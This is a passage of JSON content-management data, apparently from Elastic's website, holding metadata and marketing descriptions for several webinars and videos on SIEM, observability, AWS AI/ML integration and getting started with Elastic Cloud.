resources\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003e\u003ca href=\"/virtual-events/modernizing-siem-operations\" target=\"_self\"\u003eModernizing SIEM operations webinar\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"/explore/security-without-limits/siem-buyers-guide\" target=\"_self\"\u003eSIEM Buyer's Guide\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eWant to try it for yourself? Take some of these features for a spin with a \u003ca href=\"https://cloud.elastic.co/registration?elektra=webinar\u0026storm=landing-page\u0026rogue=cloudtrial\" target=\"_self\"\u003efree Elastic Cloud trial\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e","presentation_date":"2022-10-28T08:00:00.000Z","presenter":["blt47281ee31f9b7aa9"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6446d17b56e60042","ACL":{},"created_at":"2021-07-12T21:53:04.840Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"endpoint-security","label_l10n":"Endpoint security","tags":[],"title":"Endpoint security","updated_at":"2021-07-12T21:53:04.840Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.409Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"A day in the life of a security analyst","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-13T17:30:39.844Z","updated_by":"blt3044324473ef223b70bc674c","url":"/demo-gallery/day-in-life-security-analyst","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"Zva9fX84bbfDZaCYCmCvd4","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-13T17:30:43.708Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt7b465dcb44ea188a","_version":1,"locale":"en-us","ACL":{},"created_at":"2024-12-13T16:32:25.327Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"Customer Success Story | Observability","title_l10n":"Swift transforms product instrumentation to help drive better customer outcomes with Elastic Observability","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAs the leading global provider of secure financial transactions and payments, it's vital for SWIFT to stay relevant. With more than 45 million messages flowing through its systems every day and being at the heart of the financial industry, SWIFT is at the forefront of secure, frictionless financial services including sanctions screenings, compliance analytics, KYC (Know Your Customer) registry, and payment controls. Hear from Stefan De Moerloose, Head of Product Management for Observability \u0026amp; Analytics, who talks about how his team uses the power of Elastic to maximize value, maintain five-nines availability, and keep more than 11,000 financial customers connected across more than 200 countries and territories.\u003c/p\u003e","presentation_date":"2023-02-20T16:31:25.000Z","presenter":["bltde106efafe80ec99"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc2c6579373c53341","ACL":{},"created_at":"2021-07-12T21:53:13.753Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"apm","label_l10n":"APM","tags":[],"title":"APM","updated_at":"2021-07-12T21:53:13.753Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.194Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"Swift transforms product instrumentation to help drive better customer outcomes with Elastic Observability","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-13T16:32:25.327Z","updated_by":"blt3044324473ef223b70bc674c","url":"/videos/swift-transforms-product-instrumentation-to-help-drive-better-customer-outcomes-with-elastic-observability","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"bKdYMNqLTZiMtr1tShjus6","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-13T16:32:29.049Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt43e92faa4f522fa2","_version":5,"locale":"en-us","ACL":{},"created_at":"2024-11-07T22:40:42.670Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":" The state of observability in 2024: A view from the trenches","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eCurious about what's happening in the trenches for SRE and observability teams today? Join the observability experts at Elastic for an honest look at what's happening in the field — what's working, what's not, and how we're pushing observability forward.\u003c/p\u003e\u003cp\u003eWe'll share key details from our 2024 State of Observability report where we surveyed over 500 observability practitioners on important topics like GenAI, OpenTelemetry, managing costs, and tool consolidation. You'll also hear about real-life examples of how we're implementing observability at Elastic and in the industry today. The journey to modern observability can be a challenge, we'll cover it all in this lively panel discussion of experts!\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eImpact of GenAI: How is it being used in observability today?\u003c/li\u003e\u003cli\u003eOpenTelemetry adoption in observability\u003c/li\u003e\u003cli\u003eChallenges with tool consolidation\u003c/li\u003e\u003cli\u003eManaging cloud costs with observability\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resource\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/resources/observability/white-paper/state-of-observability-practitioner-perspective\"\u003eThe State of Observability in 2024: Practitioner perspective\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2024-12-11T17:00:00.000Z","presenter":["blt35a38140f3479c16","blt3a1eb6cad46342d4","blte1ffce298a2d9b9e"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"The state of observability in 2024: A view from the trenches","seo_description_l10n":"Modern observability can be a challenge. Hear from the experts at Elastic on what they are tackling within the observability industry today. Listen in on a lively panel discussion covering key topics and findings from our industry survey of observability practitioners. ","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"The state of observability in 2024: A view from the trenches","token":"5404845935","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-11T19:12:45.610Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/state-of-observability-practitioner-perspective","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"E1YZMzCxkMAuG3J25BBB3p","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-11T19:12:49.427Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltb14741233b08ca6c","_version":3,"locale":"en-us","ACL":{},"created_at":"2024-09-20T20:34:54.590Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Why SREs need AI and ML for observability and IT resilience","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eDiscover how Elastic Observability and AWS are collaborating to elevate customer experience and IT resilience in your application environment. In this webinar, we'll explore how AI and machine learning can revolutionize your incident resolution process through contextual observability and Amazon Bedrock.\u003c/p\u003e\u003cp\u003eElastic Observability offers a comprehensive solution that provides accurate AI-driven insights and delivers extensive visibility across your entire system. Our unified view encompasses logs, metrics, traces, and business data, all stored in a single, signal-agnostic data store. This approach eliminates blind spots and enhances operational efficiency.\u003c/p\u003e\u003cp\u003eWe'll demonstrate how our open, OpenTelemetry-first solution seamlessly integrates with your existing technology stack and adapts to your evolving needs. Learn about our AI-driven insights powered by retrieval augmented generation (RAG) and both out-of-the-box and custom ML models, enabling faster issue identification and resolution.\u003c/p\u003e\u003cp\u003eJoin us to discover how you can reduce SRE toil and future-proof your observability strategy with Elastic and AWS. Experience the next generation of observability with AI-powered Elastic Observability and see how it can transform your operations.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eThe advantages of open and unified full-stack observability\u003c/li\u003e\u003cli\u003eKey AWS AI and ML use cases for SREs\u003c/li\u003e\u003cli\u003eLeveraging Amazon Bedrock and LLMs for proactive service management\u003c/li\u003e\u003cli\u003eIntegrating Amazon Bedrock with Elastic Observability\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/aws-vpc-flow-log-analysis-with-genai-elastic\"\u003eAWS VPC Flow log analysis with GenAI in Elastic\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/aws-service-metrics-monitor-observability-easy\"\u003eWait… Elastic Observability monitors metrics for AWS services in just minutes?\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/elastic-agent-monitor-ecs-aws-fargate-observability\"\u003eUsing the Elastic Agent to monitor Amazon ECS and AWS Fargate with Elastic Observability\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/elastic-ai-assistant-observability-amazon-bedrock\"\u003eGetting started with the Elastic AI Assistant for Observability and Amazon Bedrock\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2024-10-24T16:00:00.000Z","presenter":["bltd516a87082210f90","blt142606b9c3d7b6aa"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Why SREs need AI and ML for observability and IT resilience","seo_description_l10n":"","seo_keywords_l10n":"Find out how Elastic Observability and AWS working together can bring a new level of improved customer experience and IT resilience to your application environment! We’ll show how AI and ML can help you accelerate incident resolution with contextual observability and Amazon Bedrock. Reduce SRE toil and future-proof your observability with Elastic and AWS. \n","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Why SREs need AI and ML for observability and IT resilience","token":"1929226577","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-04T09:06:00.976Z","updated_by":"blt3e52848e0cb3c394","url":"/virtual-events/aws-observability-ai-ml-resilience","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"wH1q6B9gDEWAAgU4uor24F","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-04T09:06:05.689Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt026125d71eb659ce","_version":17,"locale":"en-us","ACL":{},"created_at":"2020-12-16T00:42:41.501Z","created_by":"blt5280857d9e24912bc99a2478","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"description":"","email_merchandising_placement_number":null},"hour_time_format":false,"image":null,"main_header":{"title_l10n":"Getting started with Elastic Cloud: Create your first Kibana visualization","cta_list":{"cta_title_l10n":"","cta_type":null,"url":""},"paragraph_l10n":"","topic_heading_l10n":""},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eGetting started on Elastic Cloud is easier than ever. Elastic Cloud gives you the flexibility to deploy, operate, and scale where and how you want. \u003cbr\u003e\n\u003c/p\u003e\u003cp\u003eJoin us for a step-by-step walkthrough of how to launch your first deployment.\n\u003c/p\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eHighlights\u003c/strong\u003e\u003cbr\u003e\n\u003c/p\u003e\u003cul class=\"list-green\"\u003e\n\t\u003cli\u003eDownloading and unpacking Metricbeat\u003c/li\u003e\n\t\u003cli\u003eEditing the YAML file using a text editor\u003c/li\u003e\n\t\u003cli\u003eSetting up your first Kibana dashboard\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eSubscribe to Elastic Cloud or get started with a free 14-day trial. Elastic gives you the flexibility to deploy where you want, which means you can get started using your favorite cloud service provider:\n\u003c/p\u003e\u003cul class=\"list-green\"\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud\"\u003eGetting started on Elastic Cloud\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-on-google-cloud\"\u003eGetting started with Elastic on Google Cloud\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-on-microsoft-azure\"\u003eGetting started with Elastic on Microsoft Azure\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-on-amazon-web-services-aws\"\u003eGetting started with Elastic on AWS\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-fedramp-and-aws-govcloud\"\u003eGetting started with Elastic Cloud, FedRAMP, and AWS GovCloud\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eWhether you’re new or an existing Elastic Cloud user, we want to make sure you have everything you need to get started:\n\u003c/p\u003e\u003cul class=\"list-green\"\u003e\n\t\u003cli\u003e\u003ca href=\"/videos/getting-started-with-elastic-cloud-launch-your-first-deployment\"\u003eGetting started on Elastic Cloud: Launch your first deployment\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/campaigns/tips-and-tricks-for-getting-the-most-out-of-elastic-cloud \"\u003eTips and tricks for getting the most out of Elastic Cloud\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","presentation_date":"2021-01-07T20:36:28.000Z","presenter":["blt32ead84760f7f1e9"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Getting started with Elastic Cloud: Create your first Kibana visualization","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Getting started with Elastic Cloud: Create your first Kibana visualization","token":"oa72nsoas","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-02T20:36:32.099Z","updated_by":"blt36e890d06c5ec32c","url":"/virtual-events/create-first-kibana-visualization-elastic-cloud","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"bARGVjF6fWgRaiBVGdsWQi","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-02T20:42:32.245Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt127d1963398f389d","_version":13,"locale":"en-us","ACL":{},"created_at":"2020-12-16T00:39:36.897Z","created_by":"blt5280857d9e24912bc99a2478","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"description":"","email_merchandising_placement_number":null},"hour_time_format":false,"image":null,"main_header":{"title_l10n":"Getting started with Elastic Cloud: Launch your first deployment","cta_list":{"cta_title_l10n":"","cta_type":null,"url":""},"paragraph_l10n":"","topic_heading_l10n":""},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eGetting started on Elastic Cloud is easier than ever. Elastic Cloud gives you the flexibility to deploy, operate, and scale where and how you want. \u003cbr\u003e\n\u003c/p\u003e\u003cp\u003eJoin us for a step-by-step walkthrough of how to launch your first deployment.\u003cbr\u003e\n\u003c/p\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eHighlights\u003c/strong\u003e\u003cbr\u003e\n\u003c/p\u003e\u003cul class=\"list-green\"\u003e\n\t\u003cli\u003eQuick Elastic Cloud console overview\u003c/li\u003e\n\t\u003cli\u003eElastic Stack overview\u003c/li\u003e\n\t\u003cli\u003eLaunching a deployment\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003e\u003cbr\u003e\n\u003c/p\u003e\u003cp\u003eSubscribe to Elastic Cloud or get started with a free 14-day trial. Get started with your favorite cloud service provider:\n\u003c/p\u003e\u003cul class=\"list-green\"\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud\"\u003eGetting started on Elastic Cloud\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-on-google-cloud\"\u003eGetting started with Elastic on Google Cloud\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-on-microsoft-azure\"\u003eGetting started with Elastic on Microsoft Azure\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-on-amazon-web-services-aws\"\u003eGetting started with Elastic on AWS\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/blog/getting-started-with-elastic-cloud-fedramp-and-aws-govcloud\"\u003eGetting started with Elastic Cloud, FedRAMP, and AWS GovCloud\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eWhether you’re new or an existing Elastic Cloud user, we want to make sure you have everything you need to get started:\n\u003c/p\u003e\u003cul class=\"list-green\"\u003e\n\t\u003cli\u003e\u003ca href=\"/videos/getting-started-with-elastic-cloud-create-your-first-kibana-visualization\"\u003eGetting started with Elastic Cloud: Create your first Kibana visualization\u003c/a\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003ca href=\"/campaigns/tips-and-tricks-for-getting-the-most-out-of-elastic-cloud \"\u003eTips and tricks for getting the most out of Elastic 